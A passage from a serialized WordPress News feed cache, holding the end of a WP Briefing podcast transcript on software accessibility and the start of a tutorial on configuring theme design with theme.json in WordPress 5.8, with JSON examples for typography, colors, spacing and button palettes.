Chomphosy</strong> 0:28</p>\n\n\n\n<p>This is the second of my big scary topics for this month. I&#8217;ll be talking about accessibility, which much like Diversity, Equity and Inclusion, or DEI in the last episode, is one of those areas where the work is never finished. Also, like DEI in last episode, I feel strongly about accessibility and the need for accessible experiences in the world, but I&#8217;m aware that this is an area where I&#8217;m still learning.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 1:04</p>\n\n\n\n<p>WordPress has both an accessibility statement and team, which makes a lot of sense given that the software supports so many different people, and industries, and cultures. But if you&#8217;re not quite bought into the idea that software should be accessible, or that accessible software can&#8217;t also be usable, then this is the episode for you.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 1:25</p>\n\n\n\n<p>Before I joined the WordPress project, the majority of my work with accessibility was in the context of the digital divide. Now, when talking about the digital divide, there are three concepts around quote-unquote, &#8220;getting things to people,&#8221; and those are access, usability, and accessibility. Sometimes these words seem interchangeable, but ultimately they have nuanced differences that address different problems. And I like to think of them this way.</p>\n\n\n\n<p>Access is making sure that someone can obtain something.</p>\n\n\n\n<p>Usability is making sure that the user experience is understandable or coherent.</p>\n\n\n\n<p>And accessibility is making sure that it&#8217;s usable by the largest number of people.</p>\n\n\n\n<p>I have always considered each as a subset of the one that came before it. So having something everyone can access is good, but easy to access and easy to use is better. Easy to use is good, but easy to use and easily accessible is better.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 2:27</p>\n\n\n\n<p>After joining WordPress, I discovered that accessibility in the context of software building is well, substantially more complicated. There&#8217;s no such thing as perfect accessibility, or a site that is 100% accessible, and many aspects are pretty open to interpretation. It turns out that accessibility, like so many things in WordPress, is a complicated intersection of art and science.</p>\n\n\n\n<p>As an example, there&#8217;s a rule that says, &#8220;Ensure that links are recognizable as links.&#8221; A fast shorthand to accomplish that, that we see all over the internet, is to underline all links or put that icon next to it that says, &#8220;This opens in a new tab.&#8221; You know that icon that&#8217;s a box with an arrow? That definitely has a name, that I definitely don&#8217;t know? That icon. [laughing] But those solutions don&#8217;t necessarily fit every context that you&#8217;ll find a link in, and that&#8217;s where we see that intersection between the art of communication and the science of necessity.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 3:32</p>\n\n\n\n<p>If you came with me earlier on the idea that accessibility is a subset of usability, and it&#8217;s not a far leap to say that the choices around accessibility implementations should always include design and the overall user experience.</p>\n\n\n\n<p>I know that some of you are thinking, &#8220;But we have guidelines! Like, that&#8217;s why we have the guidelines, so that not everything has to be a gray area.&#8221; And on the one hand, yeah, that&#8217;s true. There are a lot of guidelines. There are guidelines for the code, and what the code produces, and the design elements. But I worry that when a solution is driven solely by rules, rather than reasons, we run the risk of throwing out the good along with the bad.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 4:15</p>\n\n\n\n<p>Accessibility has been a consistent topic of debate in the project for as long as I can remember, and based on all of this, it&#8217;s really clear why. There are a few big picture questions that still deserve some sort of canonical answer for WordPress, and where possible I dig in and research the positions that everyone has taken in the past. But I also have questions about how to move everything forward, especially as the editing experience gets more and more standardized across the software, which reduces cognitive load, shortens the learning curve, etc.</p>\n\n\n\n<p>What is the future possibility for having a series of more niche admin interface options?</p>\n\n\n\n<p>What would it be like to be able to account for functional limitations in a way that lets site builders select what is needed for their clients or organization, or just individual situations they know their sites would be maintained under?</p>\n\n\n\n<p>What more could we do if part of the setup flow of WordPress was to select some bundle of potential add ons for neuro diversity, or colorblindness, or dyslexia, and more?</p>\n\n\n\n<p>It&#8217;s a really big question I have.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 5:26</p>\n\n\n\n<p>And I have to be really transparent here and share that my foundational understanding of accessibility and usability is 10 plus years old, and I learned it in the context of people in education, not software. So a lot of my questions about the future of accessibility and WordPress is the result of old knowledge exploring new spaces, which means they are a little untested. And I&#8217;m so grateful for the contributors who point out what the current research and thinking is, in this incredibly complex field.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 6:00</p>\n\n\n\n<p>I normally like to wrap up the briefing with a tidy takeaway, but this particular topic doesn&#8217;t really lend itself to that. So I&#8217;ll leave you with this. I really believe in WordPress&#8217; mission to democratize publishing. And I, for one, will never stop learning about what gives people more access to the software, and what makes the software more usable, and especially how we can combine usability with accessibility in a way that puts form and function on a level playing field.</p>\n\n\n\n<p>[musical interlude]</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 6:40</p>\n\n\n\n<p>And now, that brings us to our small list of big things.</p>\n\n\n\n<p>Thing one, it&#8217;s that time of year where many of our community members take a short break to relax and refresh. I&#8217;ll be taking a bit of a break during the month of August, and so the WP Briefing will return again starting in September.</p>\n\n\n\n<p>And thing two, huge thanks to the production crew that helps me make this podcast every couple of weeks, but a special shout out to our editor Dustin Hartzler, who makes quick work of all of my rambling thoughts.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> 7:09</p>\n\n\n\n<p>And that is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in September.</p>\n\n\n\n<p>[contemporary outro music]</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11096\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:66:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"Configuring Theme Design with theme.json\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2021/07/configuring-theme-design-with-theme-json/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jul 2021 22:26:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:6:\"Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:9:\"Gutenberg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11060\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:368:\"Starting in WordPress 5.8, a new tool — “theme.json” — is available to use in your theme. Maybe you’re hearing about it for the first time, or maybe you’re testing and developing themes with it already. Either way, I&#8217;m glad you&#8217;re here because it&#8217;s an exciting time for WordPress themes. This post provides a quick introduction [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Jeff Ong\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:21957:\"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" width=\"632\" height=\"356\" src=\"https://i2.wp.com/wordpress.org/news/files/2021/07/themejson-1.png?resize=632%2C356&#038;ssl=1\" alt=\"\" class=\"wp-image-11082\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2021/07/themejson-1.png?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2021/07/themejson-1.png?resize=300%2C169&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2021/07/themejson-1.png?resize=768%2C432&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2021/07/themejson-1.png?resize=1536%2C864&amp;ssl=1 1536w, https://i2.wp.com/wordpress.org/news/files/2021/07/themejson-1.png?resize=2048%2C1152&amp;ssl=1 2048w, https://i2.wp.com/wordpress.org/news/files/2021/07/themejson-1.png?w=1264&amp;ssl=1 1264w, https://i2.wp.com/wordpress.org/news/files/2021/07/themejson-1.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Starting in <a href=\"https://wordpress.org/news/2021/07/tatum/\">WordPress 5.8</a>, a new tool — “theme.json” — is available to use in your theme. Maybe you’re hearing about it for the first time, or maybe you’re testing and developing themes with it already. Either way, I&#8217;m glad you&#8217;re here because it&#8217;s an exciting time for WordPress themes.</p>\n\n\n\n<p>This post provides a quick introduction to this new framework, and describes what’s possible by sharing a few practical tips and examples.</p>\n\n\n\n<h2>What’s theme.json?</h2>\n\n\n\n<p>Technically, theme.json is just a file that lives at the top-level of a theme’s directory.&nbsp;</p>\n\n\n\n<p>Conceptually, it’s a major shift in how themes can be developed. Theme authors now have a centralized mechanism to tailor the WordPress experience for site authors and visitors. Theme.json provides theme authors fine-grained control over global styles, block styles, and the block editor settings.</p>\n\n\n\n<p>By providing these settings and controls in a single file, theme.json provides a powerful framework that brings together many aspects of theme design and development. And as the block editor matures and adds more features, theme.json will shine as the backbone for themes and the editor to work <em>together</em> <img src=\"https://s.w.org/images/core/emoji/13.1.0/72x72/1f4aa.png\" alt=\"?\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" />. </p>\n\n\n\n<h2>Why Use it?</h2>\n\n\n\n<p>It’s the future! But if you’re like me, you might need something more tangible to be convinced. Here are a few reasons why you might use theme.json today:</p>\n\n\n\n<ul><li>Control editor settings like color, typography, spacing, and layout, and consolidate where these settings are managed.</li><li>Guarantee that styles apply correctly to blocks and elements across your site.</li><li>Reduce the amount of boilerplate CSS a theme used to provide. Theme.json won&#8217;t replace your stylesheet completely — there will be instances where CSS is needed to give your theme that extra flare (transitions, animations, etc.). But it can greatly reduce the base CSS needed from the theme.</li></ul>\n\n\n\n<h2>How do I use it?</h2>\n\n\n\n<p>The rest of this post demonstrates a few theme.json configurations you can try out. The examples use the tt1-blocks<a href=\"https://github.com/WordPress/theme-experiments/blob/master/tt1-blocks/theme.json\"> theme.json</a> — <a href=\"https://wordpress.org/themes/tt1-blocks/\">the block-based version of this year’s default theme</a>. </p>\n\n\n\n<p>If you&#8217;re starting with an existing theme, you might try copying a theme.json from the <a href=\"https://github.com/WordPress/theme-experiments/\">WordPress/theme-experiments repository</a> (for example, <a href=\"https://github.com/WordPress/theme-experiments/blob/master/fse-tutorial/theme.json\">the fse-tutorial theme</a> by <a href=\"https://profiles.wordpress.org/poena/\">@poena</a>) and adding it to the root of your theme’s directory.</p>\n\n\n\n<h3><strong>Change the typography settings of your site globally</strong></h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\">\n&quot;settings&quot;: {\n	&quot;typography&quot;: {\n		&quot;fontSize&quot;: &quot;30px&quot;,\n		...\n</pre></div>\n\n\n<p>Making the change above in theme.json would result in the following updates to your theme&#8217;s body typography styles (before and after): </p>\n\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><a href=\"https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"398\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?resize=632%2C398&#038;ssl=1\" alt=\"\" data-id=\"11062\" data-full-url=\"https://wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png\" data-link=\"https://wordpress.org/news/?attachment_id=11062\" class=\"wp-image-11062\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?resize=1024%2C645&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?resize=300%2C189&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?resize=768%2C484&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?resize=1536%2C968&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?resize=2048%2C1291&amp;ssl=1 2048w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?w=1264&amp;ssl=1 1264w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.06.07-AM.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li><li class=\"blocks-gallery-item\"><figure><a href=\"https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"398\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?resize=632%2C398&#038;ssl=1\" alt=\"\" data-id=\"11061\" data-full-url=\"https://wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png\" data-link=\"https://wordpress.org/news/?attachment_id=11061\" class=\"wp-image-11061\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?resize=1024%2C645&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?resize=300%2C189&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?resize=768%2C484&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?resize=1536%2C968&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?resize=2048%2C1291&amp;ssl=1 2048w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?w=1264&amp;ssl=1 1264w, https://i1.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.05.40-AM.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li></ul></figure>\n\n\n\n<h3><strong>Changing the base color settings of your site globally</strong></h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\">\n&quot;styles&quot;: {\n	&quot;color&quot;: {\n		&quot;background&quot;: &quot;#ffc0cb&quot;,\n		&quot;text&quot;: &quot;#6A1515&quot;\n	},\n	...\n}\n</pre></div>\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><a href=\"https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"398\" src=\"https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?resize=632%2C398&#038;ssl=1\" alt=\"\" data-id=\"11063\" data-full-url=\"https://wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png\" data-link=\"https://wordpress.org/news/?attachment_id=11063\" class=\"wp-image-11063\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?resize=1024%2C645&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?resize=300%2C189&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?resize=768%2C484&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?resize=1536%2C968&amp;ssl=1 1536w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?resize=2048%2C1291&amp;ssl=1 2048w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?w=1264&amp;ssl=1 1264w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.10.03-AM.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li><li class=\"blocks-gallery-item\"><figure><a href=\"https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"398\" src=\"https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?resize=632%2C398&#038;ssl=1\" alt=\"\" data-id=\"11064\" data-full-url=\"https://wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png\" data-link=\"https://wordpress.org/news/?attachment_id=11064\" class=\"wp-image-11064\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?resize=1024%2C645&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?resize=300%2C189&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?resize=768%2C484&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?resize=1536%2C968&amp;ssl=1 1536w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?resize=2048%2C1291&amp;ssl=1 2048w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?w=1264&amp;ssl=1 1264w, https://i2.wp.com/wordpress.org/news/files/2021/07/Screen-Shot-2021-07-23-at-11.08.54-AM.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li></ul></figure>\n\n\n\n<h3><strong><strong>Changing spacing / padding settings on specific blocks</strong></strong></h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\">\n&quot;styles&quot;: {\n	&quot;blocks&quot;: {\n		&quot;core/code&quot;: {\n			&quot;spacing&quot;: {\n				&quot;padding&quot;: {\n					&quot;top&quot;: &quot;3em&quot;,\n					&quot;bottom&quot;: &quot;3em&quot;,\n					&quot;left&quot;: &quot;3em&quot;,\n					&quot;right&quot;: &quot;3em&quot;\n				}\n			}\n		}\n	}\n}\n\n</pre></div>\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><a href=\"https://i2.wp.com/wordpress.org/news/files/2021/07/code-padding-original.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"356\" src=\"https://i2.wp.com/wordpress.org/news/files/2021/07/code-padding-original.png?resize=632%2C356&#038;ssl=1\" alt=\"\" data-id=\"11065\" data-full-url=\"https://wordpress.org/news/files/2021/07/code-padding-original.png\" data-link=\"https://wordpress.org/news/?attachment_id=11065\" class=\"wp-image-11065\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2021/07/code-padding-original.png?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2021/07/code-padding-original.png?resize=300%2C169&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2021/07/code-padding-original.png?resize=768%2C432&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2021/07/code-padding-original.png?resize=1536%2C864&amp;ssl=1 1536w, https://i2.wp.com/wordpress.org/news/files/2021/07/code-padding-original.png?w=1600&amp;ssl=1 1600w, https://i2.wp.com/wordpress.org/news/files/2021/07/code-padding-original.png?w=1264&amp;ssl=1 1264w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li><li class=\"blocks-gallery-item\"><figure><a href=\"https://i1.wp.com/wordpress.org/news/files/2021/07/code-padding-edited.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"356\" src=\"https://i0.wp.com/wordpress.org/news/files/2021/07/code-padding-edited-1024x576.png?resize=632%2C356&#038;ssl=1\" alt=\"\" data-id=\"11066\" data-full-url=\"https://wordpress.org/news/files/2021/07/code-padding-edited.png\" data-link=\"https://wordpress.org/news/?attachment_id=11066\" class=\"wp-image-11066\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/07/code-padding-edited.png?resize=1024%2C576&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/07/code-padding-edited.png?resize=300%2C169&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/07/code-padding-edited.png?resize=768%2C432&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/07/code-padding-edited.png?resize=1536%2C864&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2021/07/code-padding-edited.png?w=1600&amp;ssl=1 1600w, https://i1.wp.com/wordpress.org/news/files/2021/07/code-padding-edited.png?w=1264&amp;ssl=1 1264w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li></ul></figure>\n\n\n\n<h3><strong><strong>Set a custom color palette in the editor for specific blocks like a button </strong></strong></h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\">\n&quot;settings&quot;: {\n    &quot;blocks&quot;: {\n		&quot;core/button&quot;: {\n			&quot;color&quot;: {\n				&quot;palette&quot;: &#91; \n					{\n						&quot;name&quot;: &quot;Maroon&quot;,\n						&quot;color&quot;: &quot;#6A1515&quot;,\n						&quot;slug&quot;: &quot;maroon&quot;\n					},\n					{\n						&quot;name&quot;: &quot;Strawberry Ice Cream&quot;,\n						&quot;color&quot;: &quot;#FFC0CB&quot;,\n						&quot;slug&quot;: &quot;strawberry-ice-cream&quot;\n					}\n				]\n			}\n		}\n	}\n}\n</pre></div>\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><a href=\"https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"444\" src=\"https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?resize=632%2C444&#038;ssl=1\" alt=\"\" data-id=\"11069\" data-full-url=\"https://wordpress.org/news/files/2021/07/button-all-colors.png\" data-link=\"https://wordpress.org/news/?attachment_id=11069\" class=\"wp-image-11069\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?resize=1024%2C719&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?resize=300%2C211&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?resize=768%2C539&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?resize=1536%2C1079&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?resize=2048%2C1438&amp;ssl=1 2048w, https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?w=1264&amp;ssl=1 1264w, https://i0.wp.com/wordpress.org/news/files/2021/07/button-all-colors.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li><li class=\"blocks-gallery-item\"><figure><a href=\"https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"444\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?resize=632%2C444&#038;ssl=1\" alt=\"\" data-id=\"11070\" data-full-url=\"https://wordpress.org/news/files/2021/07/buttons-custom-palette.png\" data-link=\"https://wordpress.org/news/?attachment_id=11070\" class=\"wp-image-11070\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?resize=1024%2C719&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?resize=300%2C211&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?resize=768%2C539&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?resize=1536%2C1079&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?resize=2048%2C1438&amp;ssl=1 2048w, https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?w=1264&amp;ssl=1 1264w, https://i1.wp.com/wordpress.org/news/files/2021/07/buttons-custom-palette.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li></ul></figure>\n\n\n\n<h3><strong><strong>Enable and disable typography controls</strong></strong></h3>\n\n\n\n<p>In the following example, the ability to supply a custom font size and line height for all heading blocks is disabled:</p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\">\n	&quot;settings&quot;: {\n		&quot;blocks&quot;: {\n			&quot;core/heading&quot;: {\n				&quot;typography&quot;: {\n					&quot;customFontSize&quot;: false,\n					&quot;customLineHeight&quot;: false\n				}\n			}\n		}\n	}\n</pre></div>\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><a href=\"https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"444\" src=\"https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?resize=632%2C444&#038;ssl=1\" alt=\"\" data-id=\"11071\" data-full-url=\"https://wordpress.org/news/files/2021/07/heading-all-options.png\" data-link=\"https://wordpress.org/news/?attachment_id=11071\" class=\"wp-image-11071\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?resize=1024%2C719&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?resize=300%2C211&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?resize=768%2C539&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?resize=1536%2C1079&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?resize=2048%2C1438&amp;ssl=1 2048w, https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?w=1264&amp;ssl=1 1264w, https://i1.wp.com/wordpress.org/news/files/2021/07/heading-all-options.png?w=1896&amp;ssl=1 1896w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure></li><li class=\"blocks-gallery-item\"><figure><a href=\"https://i2.wp.com/wordpress.org/news/files/2021/07/heading-no-line-height-custom-size.png?ssl=1\"><img loading=\"lazy\" width=\"632\" height=\"444\" 